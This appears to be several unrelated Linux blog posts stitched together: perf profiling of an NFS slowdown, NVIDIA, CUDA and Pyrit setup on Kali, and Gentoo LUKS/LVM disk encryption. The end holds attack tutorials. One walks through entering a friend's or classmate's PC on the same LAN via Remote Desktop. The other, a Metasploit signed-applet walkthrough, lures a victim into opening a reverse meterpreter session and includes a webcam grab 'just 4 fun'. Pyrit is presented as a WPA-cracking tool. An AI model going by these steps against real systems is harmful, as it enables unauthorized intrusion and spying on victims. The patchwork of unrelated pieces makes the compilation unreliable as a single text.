14:04:28.659680 lstat("/nfs/object.txt", {st_mode=S_IFREG|0755,
st_size=291, ...}) = 0 <0.011364>

On the other hand, the so-called healthy user has no such worries:

strace -tt -T -e lstat /usr/bin/stat /nfs/object.txt
14:04:54.032616 lstat("/nfs/object.txt", {st_mode=S_IFREG|0755,
st_size=291, ...}) = 0 <0.000069>

There is no difference in the environment settings of the two users. They both use identical shells. Everything is perfect except that one small difference in the system call time for stat. With the usual set of your tools, you have just reached a dead end.

Call the cavalry

Now, let us see what perf can do for us. Let us run the test wrapped around the stat command. It is a very good way to start your investigation, because you will get a neat summary of what happens in the kernel, which can then help point out the next lead in your troubleshooting. Indeed, for the healthy system, we get:

Performance counter stats for '/usr/bin/stat /nfs/object.txt':

3.333125  task-clock-msecs         #      0.455 CPUs
6  context-switches         #      0.002 M/sec
0  CPU-migrations           #      0.000 M/sec
326  page-faults              #      0.098 M/sec
3947536  cycles                   #   1184.335 M/sec
2201811  instructions             #      0.558 IPC
45294  cache-references         #     13.589 M/sec
11828  cache-misses             #      3.549 M/sec

0.007327727  seconds time elapsed

For the baddie:

Performance counter stats for '/usr/bin/stat /nfs/object.txt':

14.167143  task-clock-msecs         #      0.737 CPUs
7  context-switches         #      0.000 M/sec
0  CPU-migrations           #      0.000 M/sec
326  page-faults              #      0.023 M/sec
17699949  cycles                   #   1249.366 M/sec
4424158  instructions             #      0.250 IPC
304109  cache-references         #     21.466 M/sec
60553  cache-misses             #      4.274 M/sec

0.019216707  seconds time elapsed

There is a marked difference between the two, as you can observe. While the CPU speed is the same, and the number of migrations, context switches and page faults are identical, the bad user spins approx. five times longer, using more cycles and instructions, resulting in more total time needed for the command to complete. This already shows us there is something wrong afoot.

Let us explore a little deeper. Let us now record the run and then analyze the data using the report command. This will give us a far more detailed understanding of what really happened. So here’s the report for the good user:

# Samples: 56
# Overhead  Command      Shared Object  Symbol
# ……..  …….  ……………..  ……
5.36%     stat  [kernel]           [k] page_fault
5.36%     perf  /usr/bin/perf      [.] 0x0000000000d099
3.57%     stat  [kernel]           [k] flush_tlb_others_ipi
3.57%     stat  [kernel]           [k] handle_mm_fault
3.57%     stat  [kernel]           [k] find_vma
3.57%     stat  /lib64/libc-2…   [.] __GI_strcmp
3.57%     stat  /lib64/ld-2.11…  [.] _dl_lookup_symbol_x
3.57%     perf  [kernel]           [k] _spin_lock
1.79%     stat  [kernel]           [k] flush_tlb_mm
1.79%     stat  [kernel]           [k] finish_task_switch
1.79%     stat  [kernel]           [k] ktime_get_ts

And for our naughty misbehaver, the baddie (the extra long symbol names were broken across multiple lines in the original output; they have been reassembled here):

# Samples: 143
# Overhead  Command      Shared Object  Symbol
# ……..  …….  ……………..  ……
57.34%     stat  [kernel]           [k] rpcauth_lookup_credcache [sunrpc]
2.80%     stat  [kernel]           [k] generic_match [sunrpc]
2.10%     stat  [kernel]           [k] clear_page_c
1.40%     stat  [kernel]           [k] flush_tlb_others_ipi
1.40%     stat  [kernel]           [k] __do_fault
1.40%     stat  [kernel]           [k] zap_pte_range
1.40%     stat  [kernel]           [k] handle_mm_fault
1.40%     stat  [kernel]           [k] __link_path_walk
1.40%     stat  [kernel]           [k] page_fault
1.40%     stat  /lib64/libc-2…   [.] __GI_strcmp
1.40%     stat  /lib64/ld-2.11…  [.] _dl_load_cache_lookup

Understanding the report

Before we discuss the results, we need to spend a moment or two to overview the report format. The first column indicates the percentage of the overall samples collected in the corresponding function, similar to what strace -c reports. The second column reports the process from which the samples were collected. In the per-thread/per-process mode, this will always be the name of the monitored command. In the CPU-wide mode, the command name can vary.

The third column shows the name of the ELF image where the samples came from. If a program is dynamically linked, then this may show the name of a shared library. When the samples come from the kernel, then the pseudo ELF image name [kernel.kallsyms] is used. The fourth column indicates the privilege level at which the sample was taken, i.e. when the program was running when it was interrupted. The following levels exist:

  • [.]: user level
  • [k]: kernel level
  • [g]: guest kernel level (virtualization)
  • [u]: guest os user space
  • [H]: hypervisor

The final column shows the symbol name. If you’re interested in learning more about what the specific symbol name does, you can consult The Linux Cross Reference site and search for the specific string entry, or if you have the kernel sources available and installed for your distro, normally under /usr/src/linux, then consult there. Don’t do this for fun, please. There are better ways to spend the afternoon.
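Since the report is plain columnar text, awk can pull the interesting columns out directly. The sketch below parses the (reassembled) top line of the bad user's report:

```shell
# Sketch: extract overhead and symbol name from a perf report line.
line='57.34%     stat  [kernel]   [k] rpcauth_lookup_credcache  [sunrpc]'

overhead=$(echo "$line" | awk '{print $1}')  # column 1: overhead
symbol=$(echo "$line" | awk '{print $5}')    # column 5: symbol name

echo "$overhead of samples spent in $symbol"
```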

Now, the results. We can see the difference immediately. The bad user wastes a lot of time fiddling with rpcauth_lookup_credcache, which is linked inside the sunrpc kernel module. At this point, you have all the information you need to go to the Internet and do a very narrow and intelligent search. Just by punching in the name of the symbol, you will find two or three mailing list references pointing to this phenomenon, which in turn points to a bug.

Your problem is NOT immediately solved, but you know someone else will handle it now, with solid information in your hand. This means reporting the issue to the community, the vendor, or whoever is in charge of your distro, patiently waiting for a fix, or maybe searching for a workaround that might help. But the whole point is that we used perf, which exposed information that we could not have obtained otherwise, and thus, allowed us to move forward in our troubleshooting.

Install Proprietary NVIDIA Driver + kernel Module CUDA and Pyrit on Kali Linux

Install Proprietary NVIDIA Driver On Kali Linux – NVIDIA Accelerated Linux Graphics Driver

This guide explains how to install the proprietary "NVIDIA Accelerated Linux Graphics Driver", or NVIDIA driver, on a Kali Linux system. If you are using Kali Linux and have an NVIDIA graphics card, then most likely you are using the open source NVIDIA driver nouveau. You can check with the lsmod | grep nouveau command. The nouveau driver works quite well, but if you want to use the 3D acceleration feature or GPU based applications (such as CUDA and GPU passthrough) then you need to install the proprietary NVIDIA driver. The proprietary "NVIDIA Accelerated Linux Graphics Driver" provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server. It is a binary-only Xorg driver requiring a Linux kernel module for its use. The first step is to fully update your Kali Linux system and make sure you have the kernel headers installed.

Previously, you had to download the NVIDIA Driver (CUDA) manually and edit the grub.cfg file to make everything work. Because this will be a long guide, I had to divide it into two parts:

You use the first guide to install the NVIDIA Driver. If you want GPU acceleration (cudahashcat, GPU passthrough etc.), keep reading and follow the second guide to complete your installation. I've included as much detail as I can, including troubleshooting steps and checks, but I would like to hear your part of the story, so leave a comment with your findings and issues.

The new NVIDIA Driver

The new Linux binary NVIDIA driver nvidia-kernel-dkms builds the NVIDIA Xorg binary kernel module needed by the NVIDIA driver, using DKMS. Provided that you have the kernel header packages installed, the kernel module will be built for your running kernel and automatically rebuilt for any new kernel headers that are installed. The binary NVIDIA drivers provide optimized hardware acceleration of OpenGL applications via a direct-rendering X server for graphics cards using NVIDIA chipsets. AGP, PCIe, SLI, TV-out and flat panel displays are also supported. NVIDIA added support for the following GPUs and fixed some issues (existing GPUs are already supported):

  • GeForce GT 710
  • GeForce 825M
  1. Fixed a regression that prevented NVIDIA-installer from cleaning up directories created as part of the driver installation.
  2. Added a new X configuration option “InbandStereoSignaling” to enable/disable DisplayPort in-band stereo signaling.
  3. Fixed a bug that caused PBO downloads of cube map faces to retrieve incorrect data.
  4. Fixed a bug in NVIDIA-installer that resulted in spurious error messages when opting out of installing the NVIDIA kernel module or source files for the kernel module.
  5. Added experimental support for ARGB GLX visuals when Xinerama and Composite are enabled at the same time on X.Org xserver 1.15.

See the details about this driver in NVIDIA official website:

Debian Linux usually ports that official driver to fit its requirements. The series/codename of an installed NVIDIA graphics processing unit (GPU) can usually be identified using the lspci command. For example:

lspci -nn | grep VGA
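The -nn flag makes lspci print numeric vendor:device IDs alongside the names, which is the most reliable way to identify the exact chip. This sketch extracts that ID from a sample output line (the line shown is an illustrative example for a GeForce 210; your card will differ):

```shell
# Sketch: pull the PCI vendor:device ID out of an lspci -nn line.
line='01:00.0 VGA compatible controller [0300]: NVIDIA Corporation GT218 [GeForce 210] [10de:0a65] (rev a2)'

# The last [xxxx:xxxx] bracket pair is the vendor:device ID;
# vendor 10de is NVIDIA.
id=$(echo "$line" | grep -o '\[[0-9a-f]\{4\}:[0-9a-f]\{4\}\]' | tail -1 | tr -d '[]')

echo "vendor:device = $id"
```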

My settings

My PC has the following configuration:

I've installed everything on a brand new Kali Linux 1.0.6 installation, fully updated and upgraded. Before you do anything, of course, add the official Kali Linux repositories. Once I'd added the correct Kali official repositories, I issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

If you’ve completed this part, move on to the next instruction.

Step 1: Install Linux headers

Install Linux headers as those will be required to build NVIDIA Driver modules.

aptitude -r install linux-headers-$(uname -r)

Where -r means install all recommended packages as well.   
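The $(uname -r) substitution is what ties the package name to your running kernel; the sketch below only builds that string (it does not install anything):

```shell
# Sketch: compose the header package name for the running kernel.
pkg="linux-headers-$(uname -r)"
echo "would install: $pkg"
```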

Step 2: Install NVIDIA Kernel

Next I installed NVIDIA Kernel

apt-get install nvidia-kernel-$(uname -r)

Step 3: Install NVIDIA Driver Kernel DKMS

We’re almost ready. You can now install new NVIDIA driver nvidia-kernel-dkms by using the following command:

aptitude install nvidia-kernel-dkms

Including dependencies, this is about 24MB in size; depending on how fast the Kali repo is working, you might have to wait a few minutes. You will get two popups: the first one, shown after you have installed the NVIDIA driver nvidia-kernel-dkms, says that it will disable the open source NVIDIA driver nouveau; the second one is about the xorg.conf file in the /etc/X11/ folder.

Press OK on both popups.

Step 4: Install xconfig NVIDIA driver application

If you go through the NVIDIA driver README document, you will see you need to create a new Xorg server configuration file xorg.conf, or modify the existing xorg.conf, to tell it to load the NVIDIA driver module. The nvidia-xconfig package makes this task much easier. All you need to do is install and execute it.

aptitude install nvidia-xconfig

Step 5: Generate Xorg server configuration file

Now that we have installed nvidia-xconfig package, issue the following command to generate Xorg server configuration file.

nvidia-xconfig
It will rename any existing xorg.conf file and create a new one. As directed by the nvidia-kernel-dkms popup, reboot your machine to complete the installation.

Step 6: Confirming your installation

At this point you should be able to login to your system in Graphical User Mode (GUI). In case you can’t, follow the troubleshooting section at the bottom of this article. As always, we need to check if everything went as expected.

Step 6.a: Check GLX Module

First check if system is using glx module.

glxinfo | grep -i "direct rendering"

It should output "direct rendering: Yes"

[Screenshot: glxinfo output]

If you do not have glxinfo, first install the mesa-utils package, then issue the above command again and check the output:

aptitude install mesa-utils

Step 6.b: Check NVIDIA Driver Module

Check if NVIDIA module loaded.

lsmod | grep nvidia

If it produces output like nvidia 9442880 28 or something similar (numbers could be different at your system) then NVIDIA module is loaded.

Step 6.c: Check for Open source NVIDIA Driver nouveau module

Just to be sure the open source NVIDIA driver nouveau module is NOT loaded, issue the following command:

lsmod | grep nouveau

[Screenshot: lsmod | grep nouveau output]

It should NOT produce any output. If it produces output then something is wrong.

Step 6.d: Confirm if open source NVIDIA Driver nouveau was blacklisted

I like this new NVIDIA Driver. It blacklists Open source NVIDIA Driver nouveau by default. That means less work for us to do. You can confirm it by checking files in the following directory:

cat /etc/modprobe.d/nvidia.conf
cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf
cat /etc/modprobe.d/nvidia-kernel-common.conf


You might get a black screen after installing the NVIDIA driver. Following are your options to fix it:

Troubleshooting Step A: Fixing black screen with a cursor problem

Simply press CTRL + ALT + F1 and login. Type the following


You should now be able to log in using the GDM3 GUI.

Troubleshooting Step B: Delete xorg.conf file

Press CTRL + ALT + F1 and login. Type the following

rm /etc/X11/xorg.conf

After reboot, you should be able to log in using the GDM3 GUI.

Troubleshooting Step C: remove NVIDIA Driver

Press CTRL + ALT + F1 and login. Type the following

apt-get remove nvidia-kernel-dkms

After reboot, you should be able to log in using the GDM3 GUI.


This concludes my general instructions on how to install the proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver. NVIDIA Optimus users should be able to follow the same instructions; however, as I said before, feel free to share your side of the story on how your installation went and correct my guide if required. I am open to discussion and will try to reply to your comments as soon as possible.

For those curious minds, try installing nvidia-settings and see how that goes. NVIDIA Settings will remove the NVIDIA driver, but I did manage to make it work with some tinkering. I will try to write another guide on that (NVIDIA Settings presents you with a GUI X Config window where you can see GPU temperature and more info).

The proprietary "NVIDIA Accelerated Linux Graphics Driver" provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server. In short, if your NVIDIA driver gives you a better display and 3D rendering, then you're all done. You can now play 3D games. Let me know if you want any specific Linux supported games on Kali and I can write up an article on that. But if you want to run applications that use the NVIDIA kernel module CUDA, Pyrit and Cpyrit for GPU processing, then you will also need to install the CUDA drivers, replace the official Pyrit, and install Cpyrit. Find out if your graphics card supports CUDA in the following page from NVIDIA

Mine does,

  • GeForce 210.

Next guide will show you how to Install NVIDIA Kernel Module CUDA and Pyrit in Kali Linux – CUDA, pyrit and cpyrit.   Thanks for reading. If this guide helped you to install NVIDIA Driver, please share this article and follow us in Facebook/Twitter.

Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda

In this guide, I will show how to install the NVIDIA driver kernel module CUDA, replace stock Pyrit, and install Cpyrit. At the end of this guide, you will be able to use GPU acceleration for enabled applications such as cudaHashcat, Pyrit, crunch etc.

You use the first guide to install NVIDIA Driver on Kali Linux. I would assume you followed the first guide and completed all steps there and would like to enable GPU acceleration, (cudahashcat, GPU pass through etc.) on your Kali Linux.

CUDA Toolkit

The NVIDIA® CUDA® Toolkit provides a comprehensive development environment for C and C++ developers building GPU-accelerated applications. The CUDA Toolkit includes a compiler for NVIDIA GPUs, math libraries, and tools for debugging and optimizing the performance of your applications. You’ll also find programming guides, user manuals, API reference, and other documentation to help you get started quickly accelerating your application with GPUs. You can read a lot more here in NVIDIA Developers official webpage:

CUDA Toolkit


Following are the prerequisites before you start following this guide:

Prerequisite 1: add Official Kali Linux repository.

I’ve added the correct Kali Official repositories and issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Prerequisite 2: Install proprietary NVIDIA driver on Kali Linux

I’ve installed the correct official proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver using the previous guide.

If you’ve completed both, move to next instruction.

Step 1: Install NVIDIA CUDA toolkit and openCL

At first we need to install NVIDIA CUDA toolkit and NVIDIA openCL

aptitude install nvidia-cuda-toolkit nvidia-opencl-icd

This will install the CUDA packages in your Kali Linux. The total package is pretty large including dependencies (around 282MB), so be patient and let it finish.

Step 2: Download Pyrit and Cpyrit

Download Pyrit and Cpyrit from the official website:

Save them in your /root folder.

Step 3: Install Pyrit

Follow the instructions below to install Pyrit and its prerequisites.

Step 3.a: Install Pyrit prerequisites

apt-get install python2.7-dev python2.7-libpcap libpcap-dev

Step 3.b: Remove existing installation of Pyrit

Remove stock Pyrit using the following command:

apt-get remove pyrit

You will get a message stating that it will also remove the kali-linux-full package. It actually doesn't; all it does is update the Kali repo and remove Pyrit. Finish removing Pyrit.

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Step 3.c: Install new Pyrit

Copy paste the following commands to extract downloaded Pyrit in your Kali Linux /root directory

tar -xzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0

Now build the package

python setup.py build

Once build is complete, you can install Pyrit.

python setup.py install

Up to this point, you shouldn’t receive any errors.

Step 4: Install CPyrit-cuda

Copy and paste the following commands to extract the downloaded CPyrit-cuda archive in your Kali Linux /root directory:

tar -xzf cpyrit-cuda-0.4.0.tar.gz 
cd cpyrit-cuda-0.4.0

Now build the package

python setup.py build

Once build is complete, you can install CPyrit-cuda.

python setup.py install

Again, you shouldn’t receive any errors; if there is one, go back and review each step.

Step 5: Testing and troubleshooting

Now that we’ve installed the NVIDIA driver kernel module, CUDA and Pyrit on Kali Linux, we can test the setup. The best way to test is to issue the following command:

pyrit list_cores

This gave me the error “bash: /usr/bin/pyrit: No such file or directory”.

It seems Pyrit puts its binaries in a different folder than you’d expect. The actual path for Pyrit is /usr/local/bin/pyrit.

Step 5.a: Softlink the binary or add the path to your profile

There are two ways to resolve this: you can either create a softlink or add /usr/local/bin to your PATH. The choice is again yours.

Step 5.a.i: Softlinking

This is what I followed:

ln -s /usr/local/bin/pyrit /usr/bin/pyrit

Step 5.a.ii: Add path

If you want the change only for a specific user, edit ~/.bash_profile or ~/.bashrc and add:

export PATH=$PATH:/usr/local/bin

If you want it for all users, edit /etc/profile and scroll down until you see something like:

PATH="/bin:/usr/bin:/sbin:/usr/sbin"
export PATH

Append /usr/local/bin to the end, so it becomes:

PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
export PATH
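You can sanity-check the PATH change in a throwaway shell before editing any profile file (the paths below are the ones from the /etc/profile example):

```shell
# Reproduce the /etc/profile edit in the current shell to see the result
PATH="/bin:/usr/bin:/sbin:/usr/sbin"
PATH="$PATH:/usr/local/bin"
export PATH
echo "$PATH"   # → /bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin
```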
And finally

Once you’ve either softlinked the binary or added the correct path to your profile, this is what you get:

root@kali:~# pyrit list_cores
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'CUDA-Device #1 'GeForce 210''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'

and of course I did a benchmark with my GeForce 210 card:

root@kali:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Running benchmark (2744.1 PMKs/s)... -

Computed 2744.11 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 210'': 853.1 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 648.1 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 647.6 PMKs/s (RTT 2.9)
#4: 'CPU-Core (SSE2)': 658.5 PMKs/s (RTT 3.0)


Pyrit allows you to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time trade-off. Exploiting the computational power of many-core platforms through ATI Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world’s most used security protocols.

Here’s a great benchmark done with Pyrit and CUDA for different GPUs.

Thanks for reading. If this guide helped you install the NVIDIA driver kernel module, CUDA, Pyrit and CPyrit-cuda on Kali Linux, please share this article and follow me on Facebook/Twitter.

Ah, and don’t forget to show off your Pyrit benchmark. ;)

Linux Gentoo full disk encryption (FDE) with LUKS and LVM2

Creating your encrypted partition

As before, using fdisk (or whatever partitioning tool you prefer), create two partitions.



sda1 should be set to bootable and be of filesystem type 83 (Linux); sda2 is of the same type.

I normally use ext2 for my boot partition but you can use whatever you like.

mkfs.ext2 /dev/sda1

Now we will prepare our encrypted partition. Load the following modules if they aren’t already available.

modprobe dm-crypt
modprobe aes
modprobe sha256

Now format the partition with cryptsetup.

cryptsetup luksFormat /dev/sda2

Create your password and be sure to memorize it.

Now open the encrypted partition.

cryptsetup luksOpen /dev/sda2 main

Enter your password.

You will now have access to your partition at /dev/mapper/main. Keep in mind the name “main” was chosen arbitrarily; it is just the name of the device node that represents the unlocked partition, and you can change it every time you unlock it if you want.

Now create the physical volume and volume group.

pvcreate /dev/mapper/main
vgcreate [vgname] /dev/mapper/main

Now we create two logical volumes in our new volume group [vgname].

lvcreate -L 1G -n swap [vgname]
lvcreate -L XG -n root [vgname]

Here I chose 1G for the swap volume; X is the size of the remaining space available for the root volume. You can find the remaining space with vgdisplay.

vgdisplay

If you look at the “Total PE” field you will see how much space is available for allocation. Other fields such as “Alloc PE” and “Free PE” can also be helpful.

At this point you have two logical volumes, for swap and root respectively (the examples below assume you named your volume group “vg”). You can now format them as you normally would.

mkswap /dev/vg/swap
mkfs.ext4 /dev/vg/root

At this point the rest of the Gentoo handbook applies as normal. The exception is that you will need an initramfs to unlock your encrypted partition at boot. After you create the initramfs, make sure to reference it in your grub config (or whatever you use to bootstrap your OS).

Creating the initramfs

Now on to creating the mini filesystem that the kernel loads first. It is needed to decrypt your encrypted partition so the boot process can continue.

Create a directory to work under, as we’ll be creating a filesystem.

mkdir initramfs
cd initramfs

Now create the directories with the following.

mkdir -p bin lib dev etc mnt/root proc root sbin sys

Now copy the usual device nodes from your existing filesystem into the dev directory of your initramfs.

cp -a /dev/{null,console,tty,sda1,sda2} dev/

Feel free to copy other devices as needed. Also if your drive is not sdaX change it accordingly.

You will also want to copy over the utilities you intend to use. Be sure they are compiled with the “static” USE flag, because any dynamic dependencies a binary has would also need to be copied. Building the binaries statically avoids having to copy over whole dependency chains.

Since we are using cryptsetup and LVM, we need to copy our cryptsetup and lvm binaries (built statically) onto the filesystem.

Once you build them statically just copy them into the ./sbin directory.

It’s also typical to build busybox and add it to ./bin, so feel free to customize.
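Before copying a binary into ./sbin it’s worth confirming it really is static; ldd reports “not a dynamic executable” for static binaries. A quick sketch of the check (BIN is an illustrative path, point it at your own cryptsetup or lvm build):

```shell
# Check whether a binary is statically linked before copying it into the
# initramfs; BIN here is illustrative, substitute your statically built tool.
BIN=/bin/sh
if ldd "$BIN" 2>&1 | grep -q 'not a dynamic executable'; then
  echo "$BIN is static: safe to copy alone"
else
  echo "$BIN is dynamic: its library dependencies must be copied too"
fi
```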

The main part of the initramfs is the init script in its root. It is what gets executed immediately after the kernel boots; once the real root partition is decrypted, it hands off to the real init.

Below is part of my initramfs init script. This is the minimum required to accomplish the decryption and booting we need.

#!/bin/sh

# mount proc and sys filesystems
mount -t proc none /proc
mount -t sysfs none /sys

# silence kernel printk messages during password entry
echo 0 > /proc/sys/kernel/printk

# decrypt
/sbin/cryptsetup luksOpen /dev/sda2 main

# activate the logical volumes and create their device nodes
/sbin/lvm vgscan --mknodes
/sbin/lvm lvchange -aly vg/swap
/sbin/lvm lvchange -aly vg/root

# mount the real root
mount /dev/mapper/vg-root /mnt/root

# clean up
umount /proc
umount /sys

# and we continue
exec switch_root /mnt/root /sbin/init

Save this as your init script and make it executable.

chmod u+x init

Some of the things I put in here could use a bit of explanation.

The echo 0 line disables kernel printk messages. These messages come up a lot, even while typing my password; I found that irritating, so I disable them during the initramfs phase.

The cryptsetup line is straightforward: it unlocks our encrypted partition. The lvm lines that follow activate our logical volumes and create the corresponding device nodes in /dev/mapper.

The final part is where the script hands off control to the decrypted init script on the root partition. Keep in mind that there is a space between the /mnt/root and /sbin/init.

Once you’ve laid out the filesystem to your needs, you must pack this mini filesystem into a gzipped-cpio initrd file to be loaded along with your kernel. To build the initramfs file, issue the following command.

find . -print0 | cpio --null -ov --format=newc | gzip -9 > /boot/my-initramfs.cpio.gz

Name your initramfs.cpio.gz file however you like and make sure to reference it in your bootloader. For GRUB legacy it would look something like the following.

title My Linux
root (hd0,0)
kernel /boot/my-kernel
initrd /boot/my-initramfs.cpio.gz

At this point you can reboot your system and test your setup. Your initramfs should load and allow you to enter your encrypted partition password. After that bootup should continue as usual. You can of course make your init script smarter by checking for a correct login or spawning a busybox shell if you need to. These options are left to you.

LVM device nodes

Another thing you might want to do is add a startup script, executed by your system during boot, that re-creates the LVM device nodes: they no longer exist once the initramfs is removed from memory. If you use swap, your system won’t be able to find /dev/vg/swap since its node was never created. I’m not sure why lvm doesn’t handle this automatically, but I added a simple script in /etc/local.d/ called 40_fixlvmnodes.start with the following contents.


#!/bin/sh

echo "creating lvm nodes"
/sbin/lvm vgscan --mknodes

echo "enabling swap"
swapon /dev/vg/swap

Don’t forget to make this script executable too.

chmod u+x 40_fixlvmnodes.start

Be sure to update your /etc/fstab with the appropriate device paths for your root and swap filesystems. Mine looks like this.

/dev/vg/root / ext4 noatime 0 1

/dev/vg/swap none swap sw 0 0

Additional LVM usage

It is useful to become more familiar with LVM, as you may need it to make changes later. For example, when I did this on my new laptop I had created the root logical volume too small: it was using only 172G, leaving over 500G unallocated! With lvextend you can add unallocated space to a logical volume, provided the physical volume can accommodate it.

lvextend -L+500G /dev/vg/root

Using lvextend I was able to use the full free space for my root partition, as I had originally intended. My root filesystem is ext4; for the already-existing filesystem to see the new space, I had to grow the filesystem as well.

I was able to do this, after resizing the logical volume above, with the following.

resize2fs /dev/mapper/vg-root

Keep in mind I did this from my live CD, so the filesystem was not mounted during these operations. I’ve read that ext4 can be resized online, but I prefer not to risk potential filesystem corruption.
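The grow-then-resize sequence can be rehearsed safely on a file-backed image before touching a real volume. Everything below uses a scratch file standing in for /dev/mapper/vg-root, and growing the file stands in for lvextend:

```shell
# Rehearse an offline ext4 grow on a scratch image file (no root LV needed)
truncate -s 16M /tmp/fde-demo.img
mkfs.ext4 -q -F /tmp/fde-demo.img
truncate -s 32M /tmp/fde-demo.img   # stands in for lvextend growing the LV
e2fsck -f -p /tmp/fde-demo.img      # resize2fs requires a clean fsck first
resize2fs /tmp/fde-demo.img         # grows the fs to fill the new size
```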

Once this was done I just rebooted and verified that my root partition was as large as it should be. All was good.

Final notes on full disk encryption

Note that this is not entirely full disk encryption: the boot partition is obviously left unencrypted. If you truly want your entire disk encrypted, you would perform the same operations but keep everything involving the /boot partition on a USB drive, which you would then need in order to boot your system. This offers more protection, but managing a physical item is overkill for me; I mention it in case someone is interested in doing this.

Now your root and swap partitions are fully encrypted at rest! Once your system is running, however, the disk is effectively unencrypted, so disk encryption is only really useful “at rest”. This means that if you shut down your system your content is safe; but once you boot up, your filesystem is available if you are, say, nabbed while your system is on. In addition, your crypto key sits in memory at a probably known location (cryptsetup/dm-crypt are open source, after all). It’s unlikely you will be in a scenario where this matters, as only feds and those with some fun tools can make use of this information; I just want to be complete with this article so you are more aware. Knowing the ins and outs of security is very important.

That said, enjoy!

How To Hack Windows Computers That Are On The Same LAN Network

How To Hack Same LAN Computers?

If you are working in an office or college and want to get into a friend’s or classmate’s PC on the same LAN, follow the steps below:

Go to Run> Cmd

now type command

C:\>net view

Server Name            Remark

This lists the machine names of all the computers connected to your LAN.

Now that you have the names, let’s start getting into the systems.

Once you have a server name, use the tracert command to find the IP of the target machine.

Example: C:\> tracert xyz

This gives you the IP address of the XYZ machine.

Now go to the Windows Start button and type Remote Desktop Connection.

After clicking on Remote Desktop Connection you will see the window below.

Now type the IP address or computer name of the target machine and click Connect.
It will ask for the administrator password, which you will need to know.
After a few seconds the target machine is shown on your computer.
Now you can use that machine to open websites, files, software, etc.
Enjoy the trick.

How to Hack Windows in 5 minutes


Readers, in this article everybody is going to learn techniques to exploit the Microsoft Windows 8 operating system (for teaching purposes only, so that network administrators and security specialists understand how an attacker’s mind works and can prevent the attack). Through Metasploit we will learn how to get into vulnerable Windows machines; Windows 7 SP1 and other versions are also applicable.


This exploit works using the “Java Signed Applet Method” on any browser, but requires the Java plugin to be installed. A “.jar” file is created, and the target must open a URL and allow the Java applet to run in the browser. The applet is presented to the target through a web page. The victim’s Java Virtual Machine will pop up a window asking whether they trust the signed applet; after the victim clicks “Run”, the applet runs with full permissions.

Requirements for the pentest:

  1. A machine running the Windows 8 operating system to use as the target.
  2. A computer or VM (e.g. VMware) with a Linux distribution, be it Backtrack, Kali or whatever; the important thing is to have Metasploit up and running.

First, reader, you need to open the terminal and start Metasploit:

msfconsole
Figure 1) Open metasploit.
Next, we choose the exploit to use:

Let’s type use exploit/multi/browser/java_signed_applet .

Press Enter and type show options.

Figure 2) Use exploit and show options.

Essential concepts:

SRVHOST and SRVPORT have default values of and 8080. SRVHOST is the IP address the server will listen on, used to build the URL that the target’s browser will open. When SRVHOST is left at, the target must still be able to reach this machine, so use an IP address your target can connect to (e.g. your public IP).

Figure 3) Set payload.
LHOST should be an IP address of your machine that the victim can connect back to.
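Put together, the msfconsole session looks roughly like this. The 192.168.1.10 address is a placeholder for your attacking machine’s IP, and java/meterpreter/reverse_tcp is one common payload choice, not the only one:

```
use exploit/multi/browser/java_signed_applet
set SRVHOST    # IP the target's browser will connect to
set SRVPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST      # IP for the reverse meterpreter connection
exploit
```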

Figure 4) LHOST and exploit.

When the target opens this link in their browser, a warning dialog box is displayed.

A window will open; the victim can check “I accept the risk and want to run this application” and click “Run”.

Figure 5) Java applet.


Therefore, after the victim opens the malicious URL and clicks Run, Metasploit will start a meterpreter session on the target machine, and you get full access!

You can run sessions -l to see the active sessions.
Example: sessions -i 1, where 1 is the ID of the session.

The applet is able to connect to Metasploit.

The meterpreter session starts and is ready, as planned, with options available for you to exploit the system.

Figure 6) Session starts.

This article is for ethical hacking only; now you can have fun with the commands.

Figure 7) Webcam shot: Just 4 fun.